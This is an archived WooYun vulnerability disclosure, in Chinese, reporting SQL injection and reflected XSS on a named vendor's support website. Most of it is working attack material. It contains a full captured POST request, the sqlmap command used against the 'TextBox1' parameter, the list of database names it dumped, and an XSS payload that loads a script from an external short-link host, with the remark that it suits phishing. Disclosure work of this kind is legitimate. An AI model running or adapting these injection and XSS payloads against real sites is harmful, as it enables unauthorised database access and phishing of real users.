乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-11: 细节已通知厂商并且等待厂商处理中 2015-02-16: 厂商已经主动忽略漏洞,细节向公众公开
子站存在几处post注入点及反射xss
http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?Page=2&xinwenlxbh=&XinWenMC=1http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?xinwenlxbh=XWLX20080328001http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?xinwenlxbh=XWLX20071204001&XinWenMC=1http://service.yonyou.com/ajax/ajax,UFIDA.Service.ashx?_method=GetChanPinBB&_session=no
POST /AppWeb/XinWen/XinWen.aspx?xinwenlxbh=XWLX20061113004&XinWenMC=1 HTTP/1.1Host: service.yonyou.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?xinwenlxbh=XWLX20061113004&XinWenMC=1Cookie: Hm_lvt_4280908fd6c5e0139940ea31e0eb68e1=1423411490; Hm_lpvt_4280908fd6c5e0139940ea31e0eb68e1=1423445237; ASP.NET_SessionId=gepvgwn2b3lfa445vesgxkmdConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 3210__LastVIEWSTATE_SessionKey=51ff6eeb-d9a0-4c5f-ae02-7d0cc6f8014a&__ContextPath=%2F&_qam_dialog_control=&__VIEWSTATE=%2FwEPDwULLTE4MjExMjI4MzUPZBYCAgMPZBYKAgUPPCsACQEADxYEHghEYXRhS2V5cxYAHgtfIUl0ZW1Db3VudAILZBYWZg9kFgICAw8PFgIeC05hdmlnYXRlVXJsBSZYaW5XZW4uYXNweD94aW53ZW5seGJoPVhXTFgyMDA2MTExMzAwNGQWAmYPFQEM562%2B57qm5paw6Ze7ZAIBD2QWAgIDDw8WAh8CBSZYaW5XZW4uYXNweD94aW53ZW5seGJoPVhXTFgyMDA2MTExMzAwNmQWAmYPFQEM5biC5Zy65b%2Br6YCSZAICD2QWAgIDDw8WAh8CBSZYaW5XZW4uYXNweD94aW53ZW5seGJoPVhXTFgyMDA2MTExMzAwN2QWAmYPFQEM5aqS5L2T5YWz5rOoZAIDD2QWAgIDDw8WAh8CBSZYaW5XZW4uYXNweD94aW53ZW5seGJoPVhXTFgyMDA2MTExMzAwOGQWAmYPFQEM5LiT5a626KeG54K5ZAIED2QWAgIDDw8WAh8CBSZYaW5XZW4uYXNweD94aW53ZW5seGJoPVhXTFgyMDA3MDIxMjAxMGQWAmYPFQEM5pyN5Yqh5b%2Br6K6vZAIFD2QWAgIDDw8WAh8CBSZYaW5XZW4uYXNweD94aW53ZW5seGJoPVhXTFgyMDA3MTIwNDAwMWQWAmYPFQEM5bm057uT5LiT5Yy6ZAIGD2QWAgIDDw8WAh8CBSZYaW5XZW4uYXNweD94aW53ZW5seGJoPVhXTFgyMDA4MDMyODAwMWQWAmYPFQEOTkPmnI3liqHliqjmgIFkAgcPZBYCAgMPDxYCHwIFJlhpbldlbi5hc3B4P3hpbndlbmx4Ymg9WFdMWDIwMDgwMzI4MDAyZBYCZg8VARFOQ%2BS%2FseS5kOmDqOa0u%2BWKqGQCCA9kFgICAw8PFgIfAgUmWGluV2VuLmFzcHg%2FeGlud2VubHhiaD1YV0xYMjAwODAzMjgwMDRkFgJmDxUBDk5D5pyN5Yqh5Lqn5ZOBZAIJD2QWAgIDDw8WAh8CBSZYaW5XZW4uYXNweD94aW53ZW5seGJoPVhXTFgyMDA4MDMyODAwNmQWAmYPFQEOTkPmnI3liqHmoYjkvotkAgoPZBYCAgMPDxYCHwIFJlhpbldlbi5hc3B4P3hpbndlbmx4Ymg9WFdMWDIwMTAwNDMwMDAxZBYCZg8VAQzmlrDpl7vkv6Hmga9kAgkPEA8WBh4NRGF0YVRleHRGaWVsZAUJTWluZ0NoZW5nHg5EYXRhVmFsdWVGaWVsZAUHQmlhbkhhbx4LXyFEYXRhQm91bmRnZBAVDAznrb7nuqbmlrDpl7sM5biC5Zy65b%2Br6YCSDOWqkuS9k%2BWFs%2BazqAzkuJPlrrbop4bngrkM5pyN5Yqh5b%2Br6K6vDOW5tOe7k%2BS4k%2BWMug5OQ%2BacjeWKoeWKqOaAgRFOQ%2BS%2FseS5kOmDqOa0u%2BWKqA5OQ%2BacjeWKoeS6p%2BWTgQ5OQ%2BacjeWKoeahiOS%2BiwzmlrDpl7vkv6Hmga8V6K%2B36YCJ5oup5paw6Ze757G75Z6LFQwPWFdMWDIwMDYxMTEzMDA0D1hXTFgyMDA2MTExMzAwNg9YV0xYMjAwNjExMTMwMDcPWFdMWDIwMDYxMTEzMDA4D1hXTFgyMDA3MDIxMjAxMA9YV0xYMjAwNzEyMDQwMDEPWFdMWDIwMDgwMzI4MDAxD1hXTFgyMDA4MDMyODAwMg9YV0xYMjAwODAzMjgwMDQPWFdMWDIwMDgwMzI4MDA2D1hXTFgyMDEwMDQzMDAwMQAUKwMMZ2dnZ2dnZ2dnZ2dnZGQCDw8PFgIeBFRleHQFDOetvue6puaWsOmXu2RkAhEPPCsACQEADxYEHwAWAB8BAgVkFgpmD2QWBAIBDw8WAh8CBSNYaW5XZW5aUy5hc3B4P0JpYW5IYW89WFcyMDA4MDUyMDAxMGQWAmYPFQEy55So5Y%2BLRVJQ5rex6ICV6KGM5Lia44CA5pWw5o6n5Yi26YCg5LyB5Lia562%2B57qmVThkAgIPFQEKMjAwOC8wNS8yMGQCAQ9kFgQCAQ8PFgIfAgUjWGluV2VuWlMuYXNweD9CaWFuSGFvPVhXMjAwODA0MjMwMDRkFgJmDxUBMueUqOWPi%2Bi9r%2BS7tumbhuWboueuoeaOp%2BWPikJJ5bqU55So5YaN5bGV5paw5aKD55WMZAICDxUBCjIwMDgvMDQvMjNkAgIPZBYEAgEPDxYCHwIFI1hpbldlblpTLmFzcHg%2FQmlhbkhhbz1YVzIwMDYxMTEzMDAyZBYCZg8VATrog5zmjbfpm4blm6Llho3luqbnibXmiYvlub%2FkuJznlKjlj4sg566h55CG5Y2H57qn5Yir5qC357qiZAICDxUBCjIwMDYvMTEvMTNkAgMPZBYEAgEPDxYCHwIFI1hpbldlblpTLmFzcHg%2FQmlhbkhhbz1YVzIwMDYxMTEzMDA0ZBYCZg8VASrnlKjlj4tFUlAtTkPllpznrb7kuK3lm73mnIDlpKfpkr3kuJrkvIHkuJpkAgIPFQEKMjAwNi8xMS8xM2QCBA9kFgQCAQ8PFgIfAgUjWGluV2VuWlMuYXNweD9CaWFuSGFvPVhXMjAwNjExMTMwMDZkFgJmDxUBIOeUqOWPi0VSUO%2B8jU5D562%2B57qm5bm%2F5Lic5b635piOZAICDxUBCjIwMDYvMTEvMTNkAhUPDxYCHwYFFeW9k%2BWJjemhte%2B8muesrDEvMemhtWRkZGyEMyFwK0D9WnQJnixj4cOg5Q7D&textfield=&ddlXinWenLB=XWLX20061113004&TextBox1=1&Button1=+&__EVENTVALIDATION=%2FwEWDwLO25KWDAKnuseIDAL9xZrmBwLW%2FrzLDQKb3c%2FnBALSkNa7CwKd2L%2FlBgKyuYTlAwLl%2Ff2lDQKD9a6lAgLZgOLwBQLS85D9CwLxrNb6AwLs0bLrBgKM54rGBn9%2FiG7ONSGvbs1Lr0qWStvPanIJ
在搜索框提交数据抓取数据包丢到sqlmap里去跑。虽然是反射性的xss,可用来钓鱼。
http://service.yonyou.com/error.aspx?errinfo=1
available databases [9]:[*] master[*] model[*] msdb[*] tempdb[*] test[*] UFServiceClubData[*] UFWeb[*] UFWeb_Dev[*] We7_CMSsqlmap.py -r yonyou.txt -p TextBox1 -D We7_CMS --tables
http://service.yonyou.com//error.aspx?errinfo=1</textarea>'"><script src=http://t.cn/RwAegK3></script>
过滤。。。
危害等级:无影响厂商忽略
忽略时间:2015-02-16 17:50
暂无